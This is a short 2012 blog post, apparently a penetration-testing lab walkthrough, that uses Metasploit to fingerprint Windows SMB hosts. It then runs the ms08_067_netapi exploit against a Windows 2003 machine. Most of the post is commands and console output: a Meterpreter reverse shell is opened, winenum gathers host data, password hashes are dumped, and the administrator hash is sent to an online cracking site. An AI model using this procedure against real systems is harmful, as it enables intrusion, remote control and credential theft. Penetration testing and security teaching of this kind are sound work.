Wednesday, 21 March 2012

Metasploit vs SMB


Continuing from the previous post (scanning)

Our hosts output is not very rewarding as is... so since we are looking for windows smb vulenrabilites lets look at getting some version info

  • msfconsole> use auxiliary/scanner/smb/smb_version
  • services -p 445 -R
  • show options (increase the number of threads according to your flavor and make sure that your services -p 445 -R worked fine)
  • exploit
[*] 10.1.87.129:445 is running Windows 2003 R2 Service Pack 2 (language: Unknown) (name:WIN2K3) (domain:WORKGROUP) 
[*] Scanned 1 of 3 hosts (033% complete) 
[*] 10.1.87.133:445 is running Windows Server 2008 R2 Enterprise (Build 7600) (language: Unknown) (name:WIN2K8R2-ENT) (domain:WORKGROUP) 
[*] Scanned 2 of 3 hosts (066% complete) 
[*] 10.1.87.137:445 is running Windows XP Service Pack 3 (language: English) (name:CISLAB) (domain:WORKGROUP) 
[*] Scanned 3 of 3 hosts (100% complete) 
[*] Auxiliary module execution completed
  • hosts (notice that the new info found its way in the database and appears now on the main list)
  • services -p 445 (same here :D )
  • back (we had our fill of that module lets try something else)
  • search type:exploit port:445 
  • info exploit/windows/smb/ms08_067_netapi
  • use exploit/windows/smb/ms08_067_netapi
  • services -p 445 (pick one.. this module does not have an RHOSTS option but an RHOST option)
  • set rhost 10.1.87.129
  • exploit
[*] Started reverse handler on 10.1.87.128:4444  
[*] Automatically detecting the target... 
[*] Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown 
[*] We could not detect the language pack, defaulting to English 
[*] Selected Target: Windows 2003 SP2 English (NX) 
[*] Attempting to trigger the vulnerability... 
[*] Sending stage (752128 bytes) to 10.1.87.129 
[*] Meterpreter session 1 opened (10.1.87.128:4444 -> 10.1.87.129:1055) at 2012-03-19 21:21:30 +0000
meterpreter > (Kaboom!) 
  • run winenum ( be patient... it will create a directory.. in this case /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341 and will put all the information you want from that host there)
  • background (it will leave the session open and send you back to the msfconsole prompt)
  • cd /root/.msf4/logs/scripts/winenum/WIN2K3_20120319.2341
  • ls
  • cat hashdump.txt (you could just run hashdump in the meterpreter session I know but we take the long way this time...)
  • take the Admin hash and use the rainbow tables provided online by http://www.onlinehashcrack.com 
  • sessions (will show you your active sessions) 
  • sessions -i 1 (will take you back to the active session on the 2003 box)


Stay tuned for more :P

No comments:

Post a Comment